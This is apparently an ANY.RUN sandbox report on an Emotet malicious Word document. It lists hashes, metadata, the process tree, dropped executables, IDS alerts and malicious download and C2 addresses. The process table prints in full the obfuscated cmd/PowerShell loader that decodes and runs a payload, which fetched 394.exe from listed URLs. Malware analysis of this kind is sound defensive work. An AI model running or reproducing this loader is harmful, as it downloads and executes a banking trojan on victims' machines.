Property | Value |
---|---|
download: | 6UL118444.doc |
Full analysis: | https://app.any.run/tasks/b563ba4f-2502-44f1-8c07-5b0b80702012 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | January 17, 2019, 16:49:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Alexa-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 12 12:12:00 2018, Last Saved Time/Date: Mon Nov 12 12:12:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | E7DC239954041896E6AE74ABD03CE15C |
SHA1: | 0DBE8F1E5A3C5548EF2D1C663B3C7F5F904C1E47 |
SHA256: | 18BF984F55B165527E4FA212BB339890259E44F6356BD8DF712BA324C19874D0 |
SSDEEP: | 1536:5skFocn1kp59gxBK85fBt+a9bGaHOmmlEFYFyJ7bTZalMlE1ChyqvH:5s141k/W48hGmmlEFYFyJ7bTZalMlE1k |
Extension | Detected file type (score) |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title: | - |
Subject: | - |
Author: | Alexa-PC |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:12 12:12:00 |
ModifyDate: | 2018:11:12 12:12:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6UL118444.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Microsoft Word, Exit code: 1073807364, Version: 14.0.6024.1000 | | | | |
4088 | CMD /c Cmd.EXE /C"SEt Mdal= ( [regEX]::MATcheS( ")''Nioj-'X'+]3,1[)(gNIrTsOT.eCNEreFErPEsOBrEv$ (.^| )93]raHc[,)99]raHc[+501]raHc[+58]raHc[( ecalperc- 63]raHc[,)89]raHc[+601]raHc[+221]raHc[(ecALPER- 421]raHc[,)001]raHc[+45]raHc[+98]raHc[( ecALPER- )') '+'(Dn'+'Eo'+'tDA'+'e'+'R'+'.'+') '+'}'+' '+') iICS'+'a::]GNiDo'+'cne.TX'+'et[ , _bjz (r'+'E'+'DA'+'eR'+'mae'+'R'+'ts.oI'+' '+'Tcejb'+'o-'+'WEN{T'+'cejbO-hcAe'+'rOFd6Y )'+' '+'sseRPmocEd::]eDom'+'no'+'I'+'S'+'s'+'E'+'rPMOC.'+'N'+'OIs'+'S'+'e'+'rp'+'MoC.Oi.Metsy'+'S[ ,'+' )'+'c'+'iU==g'+'B'+'6T'+'X8ZDpQJ'+'luNy5FdT'+'+'+'s'+'QYRWw0a'+'H'+'a0'+'VPg'+'qKy5z'+'aMlMgl'+'JMqyOz'+'Xzl'+'Y'+'su'+'7M43rqia'+'mI'+'peS4XrZA'+'J1y'+'u'+'Y5R4'+'OuB0jq'+'1PBbbt'+'CcbdrZMa'+'5x'+'n+RTsc5'+'9a'+'RoFi9'+'x'+'34'+'PZVb'+'j'+'B1qWdsxzU'+'0comd'+'z'+'n5cM5'+'EEPhe'+'GwM'+'XQ'+'D2'+'/Pz6Rrd'+'f'+'z0cnH'+'4P'+'6'+'BiPQlJJ'+'NVI'+'E1K'+'X'+'Q'+'F'+'bWDF'+'ILTui'+'3rFcLBy'+'+M8RD8'+'O'+'D9Q'+'SOrI'+'3SAP'+'z'+'2evGd6PBR3dB'+'7Xr8'+'ivIci46'+'5aH'+'Yd'+'LBi'+'cZlc'+'I'+'Xsf'+'d'+'9Tf'+'C'+'r6lulJ'+'u'+'MoASHaVgOx'+'MZ7AVM'+'6T'+'m7'+'TKo9See'+'II812E'+'ciL0w'+'FVRQ0K'+'7Q'+'Ibxj'+'2'+'O7j'+'jUTK'+'Mt'+'3w9U'+'gMS/QocdzJYBD'+'12T'+'zJ'+'y'+'sz'+'5'+'z55vpxi'+'7urwRU2'+'2N'+'pDU2aAUNLe'+'Q'+'E'+'h'+'CxRH0HEaI6EHcj3S'+'QK2'+'8'+'S'+'Zf'+'VIExIgTd'+'DZ'+'RciU(gNirTs46EsAbm'+'ORF'+'::]TR'+'EV'+'noc'+'.MET'+'s'+'YS[ '+']maeRTs'+'YR'+'O'+'M'+'EM.Oi.M'+'eTsYS'+'[ (MAerTSetAL'+'fed.NO'+'iS'+'sERP'+'mOC.Oi.mEts'+'ys Tcejbo-WEN ( )ci'+'UciUNio'+'J-'+'c'+'iUXciU+'+']'+'3,'+'1[)'+'E'+'CNeREFe'+'RP'+'eso'+'BrE'+'vbj'+'z]Gn'+'ir'+'ts[( '+'(. '((",'.', 'r'+'igHtto'+'leFT') -JOin '') ^| ^&( $EnV:comSPeC[4,15,25]-JOiN'')&&POwErSheLl ^& ( \"{1}{0}\"-f'eX','i' ) (( ^& ( \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L' )).\"V`ALUe\" )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows Command Processor, Exit code: 0, Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
2680 | Cmd.EXE /C"SEt Mdal= ( [regEX]::MATcheS( ")''Nioj-'X'+]3,1[)(gNIrTsOT.eCNEreFErPEsOBrEv$ (.| )93]raHc[,)99]raHc[+501]raHc[+58]raHc[( ecalperc- 63]raHc[,)89]raHc[+601]raHc[+221]raHc[(ecALPER- 421]raHc[,)001]raHc[+45]raHc[+98]raHc[( ecALPER- )') '+'(Dn'+'Eo'+'tDA'+'e'+'R'+'.'+') '+'}'+' '+') iICS'+'a::]GNiDo'+'cne.TX'+'et[ , _bjz (r'+'E'+'DA'+'eR'+'mae'+'R'+'ts.oI'+' '+'Tcejb'+'o-'+'WEN{T'+'cejbO-hcAe'+'rOFd6Y )'+' '+'sseRPmocEd::]eDom'+'no'+'I'+'S'+'s'+'E'+'rPMOC.'+'N'+'OIs'+'S'+'e'+'rp'+'MoC.Oi.Metsy'+'S[ ,'+' )'+'c'+'iU==g'+'B'+'6T'+'X8ZDpQJ'+'luNy5FdT'+'+'+'s'+'QYRWw0a'+'H'+'a0'+'VPg'+'qKy5z'+'aMlMgl'+'JMqyOz'+'Xzl'+'Y'+'su'+'7M43rqia'+'mI'+'peS4XrZA'+'J1y'+'u'+'Y5R4'+'OuB0jq'+'1PBbbt'+'CcbdrZMa'+'5x'+'n+RTsc5'+'9a'+'RoFi9'+'x'+'34'+'PZVb'+'j'+'B1qWdsxzU'+'0comd'+'z'+'n5cM5'+'EEPhe'+'GwM'+'XQ'+'D2'+'/Pz6Rrd'+'f'+'z0cnH'+'4P'+'6'+'BiPQlJJ'+'NVI'+'E1K'+'X'+'Q'+'F'+'bWDF'+'ILTui'+'3rFcLBy'+'+M8RD8'+'O'+'D9Q'+'SOrI'+'3SAP'+'z'+'2evGd6PBR3dB'+'7Xr8'+'ivIci46'+'5aH'+'Yd'+'LBi'+'cZlc'+'I'+'Xsf'+'d'+'9Tf'+'C'+'r6lulJ'+'u'+'MoASHaVgOx'+'MZ7AVM'+'6T'+'m7'+'TKo9See'+'II812E'+'ciL0w'+'FVRQ0K'+'7Q'+'Ibxj'+'2'+'O7j'+'jUTK'+'Mt'+'3w9U'+'gMS/QocdzJYBD'+'12T'+'zJ'+'y'+'sz'+'5'+'z55vpxi'+'7urwRU2'+'2N'+'pDU2aAUNLe'+'Q'+'E'+'h'+'CxRH0HEaI6EHcj3S'+'QK2'+'8'+'S'+'Zf'+'VIExIgTd'+'DZ'+'RciU(gNirTs46EsAbm'+'ORF'+'::]TR'+'EV'+'noc'+'.MET'+'s'+'YS[ '+']maeRTs'+'YR'+'O'+'M'+'EM.Oi.M'+'eTsYS'+'[ (MAerTSetAL'+'fed.NO'+'iS'+'sERP'+'mOC.Oi.mEts'+'ys Tcejbo-WEN ( )ci'+'UciUNio'+'J-'+'c'+'iUXciU+'+']'+'3,'+'1[)'+'E'+'CNeREFe'+'RP'+'eso'+'BrE'+'vbj'+'z]Gn'+'ir'+'ts[( '+'(. '((",'.', 'r'+'igHtto'+'leFT') -JOin '') ^| ^&( $EnV:comSPeC[4,15,25]-JOiN'')&&POwErSheLl ^& ( \"{1}{0}\"-f'eX','i' ) (( ^& ( \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L' )).\"V`ALUe\" )" | C:\Windows\system32\cmd.exe | — | CMD.exe |
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows Command Processor, Exit code: 0, Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
2932 | POwErSheLl & ( \"{1}{0}\"-f'eX','i' ) (( & ( \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L' )).\"V`ALUe\" ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows PowerShell, Exit code: 0, Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3952 | "C:\Users\admin\AppData\Local\Temp\394.exe" | C:\Users\admin\AppData\Local\Temp\394.exe | — | powershell.exe |
User: admin, Company: Micr, Integrity Level: MEDIUM, Exit code: 0, Version: 6.2.9200. | | | | |
2584 | "C:\Users\admin\AppData\Local\Temp\394.exe" | C:\Users\admin\AppData\Local\Temp\394.exe | | 394.exe |
User: admin, Company: Micr, Integrity Level: MEDIUM, Exit code: 0, Version: 6.2.9200. | | | | |
3544 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | | 394.exe |
User: admin, Company: Micr, Integrity Level: MEDIUM, Exit code: 0, Version: 6.2.9200. | | | | |
4056 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | | lpiograd.exe |
User: admin, Company: Micr, Integrity Level: MEDIUM, Exit code: 1073807364, Version: 6.2.9200. | | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE563.tmp.cvr | — | — | — |
2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4T94GICG78ZL62Q5LU7V.temp | — | — | — |
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF912D573C4DEEAF12.TMP | — | — | — |
2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
2932 | powershell.exe | C:\Users\admin\AppData\Local\Temp\394.exe | executable | B748C2C3B7420647F57C82C288CE1647 | 5CFD134C67B2EA0DDD16A2B7F1E639F4B71301EFE22775CE5639A2338FF8576F |
2584 | 394.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | B748C2C3B7420647F57C82C288CE1647 | 5CFD134C67B2EA0DDD16A2B7F1E639F4B71301EFE22775CE5639A2338FF8576F |
2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20eff2.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$L118444.doc | pgc | D381ADFFF2D58081C2168EEE10AE3721 | 67DECE0B1C5F646CAD095D250B2A1E9DF6C132C49AD4031CAE752C6371CC351C |
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 7261EB6FD62F078A859E03E917B42E56 | 656F7759AC706C7C9308FF39822D7803301642B802B62137D84D6A0F924D316C |
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9CF5976A-0CF7-4F52-A8F6-2C04D6230566}.tmp | binary | C37C81E721C9788A34CBE4ADFDC488A4 | E1410D70F5CE4D58DC672F47C2DABE7BCC30706E97EB4CA6F9A60F6D5E22F14B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4056 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
2932 | powershell.exe | GET | 200 | 190.187.192.211:80 | http://corporaciondelsur.com.pe/1QByaBRWa/ | PE | executable | 448 Kb | malicious |
2932 | powershell.exe | GET | 301 | 190.187.192.211:80 | http://corporaciondelsur.com.pe/1QByaBRWa | PE | html | 340 b | malicious |
2932 | powershell.exe | GET | 403 | 38.76.31.227:80 | http://www.alefbookstores.com/sources/Fix-Serialization/PXjjiWaEs7/ | US | text | 15 b | malicious |
2932 | powershell.exe | GET | 301 | 38.76.31.227:80 | http://www.alefbookstores.com/sources/Fix-Serialization/PXjjiWaEs7 | US | html | 178 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2932 | powershell.exe | 38.76.31.227:80 | www.alefbookstores.com | Cogent Communications | US | malicious |
4056 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
2932 | powershell.exe | 190.187.192.211:80 | corporaciondelsur.com.pe | AMERICATEL PERU S.A. | PE | malicious |
Domain | IP | Reputation |
---|---|---|
www.alefbookstores.com | 38.76.31.227 | malicious |
corporaciondelsur.com.pe | 190.187.192.211 | malicious |
PID | Process | Class | Message |
---|---|---|---|
2932 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2932 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2932 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2932 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2932 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
4056 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
4056 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |